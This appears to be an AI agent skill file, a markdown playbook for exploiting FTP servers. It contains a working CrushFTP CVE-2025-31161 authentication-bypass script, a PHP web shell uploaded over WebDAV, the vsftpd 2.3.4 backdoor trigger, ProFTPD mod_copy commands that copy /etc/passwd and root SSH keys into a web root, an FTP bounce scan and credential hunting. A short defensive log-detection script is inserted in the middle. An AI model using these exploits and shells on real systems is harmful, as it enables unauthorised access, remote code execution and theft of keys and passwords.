---
name: FTP Server Exploitation
description: |
  This skill should be used when FTP services are detected, including:
  - CrushFTP (CVE-2025-31161 auth bypass)
  - vsftpd (backdoor)
  - ProFTPD (mod_copy)
  - Pure-FTPd, FileZilla Server
  Covers authentication bypass, file access, and privilege escalation.
version: 1.0.0
---
# FTP Server Exploitation Skill
## Service Identification

### Banner Analysis

```bash
# Nmap FTP detection
nmap -sV -sC -p 21 <TARGET>

# Manual banner grab
nc <TARGET> 21
curl ftp://<TARGET>
```
### Common FTP Servers

| Banner Contains | Server | Notable Vulns |
|---|---|---|
| CrushFTP | CrushFTP | CVE-2025-31161 auth bypass |
| vsFTPd 2.3.4 | vsftpd | Backdoor RCE |
| ProFTPD 1.3.5 | ProFTPD | mod_copy arbitrary write |
| Pure-FTPd | Pure-FTPd | Check version for vulns |
| FileZilla | FileZilla Server | Config file disclosure |
## CVE-2025-31161: CrushFTP Authentication Bypass

**CRITICAL** - Allows unauthenticated access to any user account
### Affected Versions

- CrushFTP < 11.3.1 (v11 branch)
- CrushFTP < 10.8.4 (v10 branch)

### Detection

```bash
# Look for CrushFTP web interface
curl -s http://<TARGET>/WebInterface/ | grep -i crush

# Check version in response headers
curl -sI http://<TARGET>/WebInterface/
```
### Exploit: AWS4-HMAC-SHA256 Auth Bypass

```bash
#!/bin/bash
# CrushFTP Auth Bypass - CVE-2025-31161
TARGET="ftp.target.htb"
USER="admin"  # User to impersonate (try: admin, crushadmin, root)

# Generate session cookie
timestamp=$(date +%s)
random=$(head -c 30 /dev/urandom | base64 | tr -dc a-zA-Z0-9 | head -c 30)
cookie="${timestamp}_${random}"
c2f="${cookie: -4}"

# Authenticate as any user without password
curl -s -X POST "http://${TARGET}/WebInterface/function/" \
  -H "Cookie: CrushAuth=${cookie}" \
  -H "Authorization: AWS4-HMAC-SHA256 Credential=${USER}/" \
  -d "command=getUsername&c2f=${c2f}"
echo ""
echo "Authenticated as ${USER}"

# List users (if admin)
curl -s -X POST "http://${TARGET}/WebInterface/function/" \
  -H "Cookie: CrushAuth=${cookie}; currentAuth=${c2f}" \
  -d "command=getUserList&c2f=${c2f}&serverGroup=MainUsers"

# List VFS (virtual filesystem)
curl -s -X POST "http://${TARGET}/WebInterface/function/" \
  -H "Cookie: CrushAuth=${cookie}; currentAuth=${c2f}" \
  -d "command=getXMLListing&c2f=${c2f}&path=/"
```
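From the defender's side, the request above is recognisable in web or proxy logs: it carries an `AWS4-HMAC-SHA256` Authorization header whose `Credential` is just a user name and a trailing slash, with none of the scope or `Signature=` that a genuine Signature Version 4 header has. The check below is an added example (not part of this skill or of CrushFTP); the record format and the sample requests are constructed for it.

```python
import re

# Constructed request records (not real logs): "METHOD PATH | Header: value | ...".
SAMPLE_REQUESTS = [
    "POST /WebInterface/function/ | Authorization: AWS4-HMAC-SHA256 Credential=admin/ "
    "| Cookie: CrushAuth=1712345678_Xy9Qa1Bz",
    "POST /WebInterface/function/ | Authorization: AWS4-HMAC-SHA256 "
    "Credential=AKIDEXAMPLE/20250401/us-east-1/s3/aws4_request, "
    "SignedHeaders=host;x-amz-date, Signature=deadbeef",
    "POST /WebInterface/function/ | Cookie: CrushAuth=1712345678_Xy9Qa1Bz; currentAuth=a1Bz",
    "GET /WebInterface/ | Authorization: Basic dXNlcjpwYXNz",
]

AWS4_RE = re.compile(r"^AWS4-HMAC-SHA256\s+(.*)$", re.IGNORECASE)
CRED_RE = re.compile(r"Credential=([^,\s]*)")


def parse_record(line):
    """Split one constructed record into (method, path, {lowercased header: value})."""
    fields = [f.strip() for f in line.split(" | ")]
    method, path = fields[0].split(" ", 1)
    headers = {}
    for field in fields[1:]:
        name, _, value = field.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def bypass_indicator(path, headers):
    """Return the user named in a CVE-2025-31161-style request, else None."""
    match = AWS4_RE.match(headers.get("authorization", ""))
    if not path.startswith("/WebInterface/function/") or not match:
        return None
    cred = CRED_RE.search(match.group(1))
    if not cred:
        return None
    # Genuine SigV4: Credential=key/date/region/service/aws4_request plus a
    # Signature= field; the bypass request in this skill sends only '<user>/'.
    scope = cred.group(1).split("/")
    well_formed = (len(scope) == 5 and all(scope) and scope[-1] == "aws4_request"
                   and "Signature=" in match.group(1))
    return None if well_formed else (scope[0] or "<empty>")


def scan(lines):
    """Return [(line_number, impersonated_user)] for every flagged record."""
    hits = []
    for number, line in enumerate(lines, 1):
        user = bypass_indicator(*parse_record(line)[1:])
        if user is not None:
            hits.append((number, user))
    return hits
```

On the sample, only the first record is flagged (as user `admin`); the well-formed SigV4 header, the cookie-only request and the Basic-auth request pass, so the rule can run on live traffic without alerting on every AWS4 header.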
### File Upload via WebDAV

```bash
# Upload PHP shell (if VFS maps to web root)
echo '<?php system($_GET["cmd"]); ?>' | curl -s -X PUT \
  "http://${TARGET}/webProd/shell.php" \
  -H "Cookie: CrushAuth=${cookie}; currentAuth=${c2f}" \
  --data-binary @-

# Access shell
curl "http://${TARGET}/shell.php?cmd=id"
```
### Enumerate VFS Paths

```text
# Common VFS paths to check
/webProd   # Often maps to web root
/home      # User home directories
/IT        # IT department files
/backup    # Backup files
/.ssh      # SSH keys!
```
## vsftpd 2.3.4 Backdoor

```bash
# Trigger backdoor with :) in username
nc <TARGET> 21
USER backdoored:)
PASS anything

# Connect to backdoor shell
nc <TARGET> 6200
```
## ProFTPD mod_copy (CVE-2015-3306)

```bash
# Copy files without authentication
nc <TARGET> 21
site cpfr /etc/passwd
site cpto /var/www/html/passwd.txt

# Copy SSH key
site cpfr /root/.ssh/id_rsa
site cpto /var/www/html/id_rsa
```
## Anonymous FTP Access

```bash
# Check anonymous login
ftp <TARGET>
# Username: anonymous
# Password: anonymous@

# Or via curl
curl ftp://anonymous:anonymous@<TARGET>/

# Download all files
wget -r ftp://anonymous:anonymous@<TARGET>/
```
## FTP Bounce Attack

```bash
# Use FTP server to scan internal network
nmap -b anonymous:anonymous@<TARGET> 10.0.0.0/24
```
## Post-Exploitation: Password Hunting

After gaining FTP access, search for:

```bash
# Config files
grep -r "password" /path/to/ftp/
grep -r "pass" /path/to/ftp/
grep -r "credential" /path/to/ftp/
```

```text
# Common password locations
config.php
.env
web.config
settings.xml
database.yml
```
### CrushFTP VFS to SSH Key

If CrushFTP VFS exposes /root or user home directories:

```bash
# Check for SSH keys
curl -s "http://${TARGET}/.ssh/id_rsa" \
  -H "Cookie: CrushAuth=${cookie}; currentAuth=${c2f}"

# Or via API
curl -s -X POST "http://${TARGET}/WebInterface/function/" \
  -H "Cookie: CrushAuth=${cookie}; currentAuth=${c2f}" \
  -d "command=getXMLListing&c2f=${c2f}&path=/.ssh"
```